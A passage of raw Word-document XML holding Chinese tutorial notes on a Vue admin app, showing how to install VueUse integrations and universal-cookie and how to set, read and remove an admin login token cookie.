        <w:t xml:space="preserve">                        duration: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4E613" w14:textId="71B60EF2" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    }) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A4BA9" w14:textId="70686162" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB61C05" w14:textId="6F6CD606" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8DE8F" w14:textId="3D5B93E6" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3224AD" w14:textId="7D45B1CC" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00247D35">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>router.push("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4B2302" w14:textId="57B5C8DA" w:rsidR="00DE164E" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8AE489" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076E2953" w14:textId="7A26F46C" w:rsidR="00DE164E" w:rsidRDefault="00DC2220" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="694" w:name="_Toc159780124"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，存储用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:bookmarkEnd w:id="694"/>
    </w:p>
    <w:p w14:paraId="6F38FA49" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRPr="00DC2220" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E6C664" w14:textId="67666139" w:rsidR="00DE164E" w:rsidRDefault="00282366" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重要的工具库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ue</w:t>
      </w:r>
      <w:r>
        <w:t>Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B55DE8A" w14:textId="6FE0B21B" w:rsidR="00DE164E" w:rsidRPr="00DB68EE" w:rsidRDefault="00DB68EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB68EE">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584749D8" w14:textId="625515F3" w:rsidR="00DE164E" w:rsidRPr="00DB68EE" w:rsidRDefault="00DB68EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB68EE">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://vueuse.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8CB18" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A66DDFF" w14:textId="175F50DD" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:t>usecookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC43994" w14:textId="577267EF" w:rsidR="00DE164E" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00641158">
        <w:t>https://vueuse.org/integrations/useCookies/#usecookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E19EC8" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696CC084" w14:textId="0479D8D6" w:rsidR="00B1571F" w:rsidRDefault="00B1571F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>universal</w:t>
      </w:r>
      <w:r>
        <w:t>-cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的依赖，所以安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>niversal-cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前先安装这个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D6D7D1" w14:textId="221BE702" w:rsidR="00B1571F" w:rsidRPr="00B1571F" w:rsidRDefault="00B1571F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1571F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm i @vueuse/integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E359AFE" w14:textId="3459B8C2" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B1571F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1571F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pm</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1571F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B1571F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i install universal-cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEDBC32" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107C7118" w14:textId="45424380" w:rsidR="00DE164E" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>静态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重写</w:t>
      </w:r>
      <w:r w:rsidR="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00104575">
        <w:t>ages/index.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109B913" w14:textId="6C8200C3" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义三个按钮，分别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B8001" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A820A2E" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD5B4D" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56349BF2" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F803C" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-button @click="set"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F75828" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-button @click="get"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FDF8FB" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-button @click="remove"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445982B" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB5B26" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C149D1D" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC5959" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useCookies } from '@vueuse/integrations/useCookies'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A13BF3" w14:textId="68B6BAB5" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    const cookie = useCookies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85AEB2" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>function set(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BBF34" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        cookie.set('admin-token', '1234567')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32EDE1" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDCAF39" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033AF96C" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    function get(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F644D" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        console.log(cookie.get('admin-token'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A379D11" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62915D65" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB8E08A" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    function remove(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388B056B" w14:textId="77777777" w:rsidR="00104575" w:rsidRPr="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        cookie.remove('admin-token')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BBA4E" w14:textId="77777777" w:rsidR="00104575" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00104575">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9EBAED" w14:textId="0207136A" w:rsidR="00641158" w:rsidRDefault="00104575" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D75ECDE" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000CC12A" w14:textId="5EAFBD54" w:rsidR="00641158" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36489B33" w14:textId="7DB07465" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置，发生在登陆后，就在登录成功后，设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701DDAD" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRPr="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE37CD1" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA7CE4">
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B2ACC" w14:textId="0E3813CD" w:rsidR="00641158" w:rsidRPr="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7CE4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useCookies } from '@vueuse/integrations/useCookies'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388592FA" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77645129" w14:textId="77777777" w:rsidR="00641158" w:rsidRDefault="00641158" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418C9129" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const onSubmit = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A9B5A0" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    formRef.value.validate((valid) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A98BE6" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (valid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068C90D" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            console.log('submit!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5D109" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176133E4" w14:textId="77777777" w:rsidR="00BA7CE4" w:rsidRDefault="00BA7CE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
